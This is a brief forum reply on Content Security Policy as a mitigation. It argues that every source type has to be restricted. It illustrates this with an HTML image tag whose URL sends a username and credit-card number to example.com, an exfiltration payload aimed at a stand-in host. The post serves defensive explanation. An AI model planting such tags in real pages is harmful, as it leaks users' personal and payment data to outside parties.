Re: Possible mitigation?
The CSP will do this for you already. But you have to lock everything down. If, for example, you allow images from anywhere then I can exfiltrate data by including the image:
<img src="http://example.com/save-hacked-details/?user=brewsters-angle-grinder&credit-card=1234-0000-8000-1234&">